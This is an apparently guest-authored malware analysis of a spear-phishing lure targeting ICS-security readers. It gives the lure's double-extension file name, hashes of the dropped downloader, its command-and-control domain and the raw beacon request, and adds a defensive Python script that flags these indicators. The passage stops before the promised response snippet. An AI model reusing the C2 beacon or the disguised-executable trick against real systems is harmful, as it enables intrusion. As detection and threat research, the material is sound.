The following is a guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security.
Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp://research.digitalvortex.com/. The downloaded zip file had the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip
Size: 1886505
MD5: 820B1CD69828983C089370BDC3CF5870
This archive contained an executable with the following properties:
File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe
Size: 2192363
MD5: C6B95B178188B8C35D14BED40520E685
When executed in a lab environment this executable installed a Trojan downloader with the following properties:
File: spoolsvr.exe
Size: 73728
MD5: 5FF3269FACA4A67D1A4C537154AAAD4B
Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe
As shown by this VirusTotal report, this downloader was detected by only 7 of 42 antivirus products. The downloader connects to its command and control server at hxxp://hint[.]happyforever[.]com with the following GET request:
GET /logo.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: hint.happyforever.com
Connection: Keep-Alive
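The check-in above is a plain HTTP GET with a stock MSIE 6 User-Agent, so the host and path are the indicators worth matching on. The script below is an added example (not code from the original post or from Shadowserver) that turns the indicators listed above into a small detection: it parses raw HTTP requests, flags the exact beacon and, more loosely, any request to the C2 host, and classifies files by known MD5 or by the "document.pdf.exe" double-extension trick used for the lure. The sample requests and file contents are constructed for the example; only the hashes, host, path and User-Agent come from the analysis.

```python
import hashlib
import re

# Indicators from the analysis above (hashes lowercased for comparison).
C2_HOST = "hint.happyforever.com"
C2_PATH = "/logo.html"
# The beacon's User-Agent is a stock MSIE 6 / .NET CLR string, far too common to
# alert on by itself; it is only used to tighten the host+path match.
BEACON_UA_PREFIX = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;"

KNOWN_MD5 = {
    "820b1cd69828983c089370bdc3cf5870": "Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.zip",
    "c6b95b178188b8c35d14bed40520e685": "Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe",
    "5ff3269faca4a67d1a4c537154aaad4b": "spoolsvr.exe",
}

# A document-looking name that actually ends in an executable extension.
DOUBLE_EXT = re.compile(r"\.(pdf|doc|docx|xls|xlsx|ppt|txt)\.(exe|scr|com|pif|bat)$", re.I)


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into its request line and a lowercase header map."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():          # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def is_spoolsvr_beacon(req: dict) -> bool:
    """True only when method, host, path and User-Agent all match the lab check-in."""
    headers = req["headers"]
    return (
        req["method"] == "GET"
        and headers.get("host", "").lower() == C2_HOST
        and req["path"] == C2_PATH
        and headers.get("user-agent", "").startswith(BEACON_UA_PREFIX)
    )


def contacts_c2_host(req: dict) -> bool:
    """Looser check: any request whose Host header is the C2 domain."""
    return req["headers"].get("host", "").lower() == C2_HOST


def find_beacons(requests) -> list:
    """Indices of the raw requests that match the exact beacon signature."""
    return [i for i, raw in enumerate(requests) if is_spoolsvr_beacon(parse_http_request(raw))]


def classify_file(filename: str, data: bytes) -> str:
    """Return 'known-sample', 'double-extension' or 'clean' for a file from mail or disk."""
    if hashlib.md5(data).hexdigest() in KNOWN_MD5:
        return "known-sample"
    if DOUBLE_EXT.search(filename):
        return "double-extension"
    return "clean"


# Constructed sample traffic: the check-in from the post plus two other requests.
SAMPLE_REQUESTS = [
    "GET /logo.html HTTP/1.1\r\nAccept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
    ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\n"
    "Host: hint.happyforever.com\r\nConnection: Keep-Alive\r\n\r\n",
    # same path, unrelated host: not the beacon
    "GET /logo.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n\r\n",
    # C2 host, different path: caught by the host-only check, not the exact signature
    "GET /index.html HTTP/1.1\r\nHost: hint.happyforever.com\r\nUser-Agent: curl/7.19.7\r\n\r\n",
]

if __name__ == "__main__":
    print("exact beacon:", find_beacons(SAMPLE_REQUESTS))
    print("any C2 host contact:",
          [i for i, r in enumerate(SAMPLE_REQUESTS) if contacts_c2_host(parse_http_request(r))])
    print(classify_file("Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe", b"MZ\x90\x00"))
```

In practice the host-only check is the one to deploy, since the path and User-Agent can change between builds while the C2 domain is what the implant has to reach; the same domain should also be matched in DNS logs, where it will show up even if the HTTP request is sent over a proxy that rewrites headers.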
The logo.html response contained encoded instructions and a payload. A snippet of the response is as follows: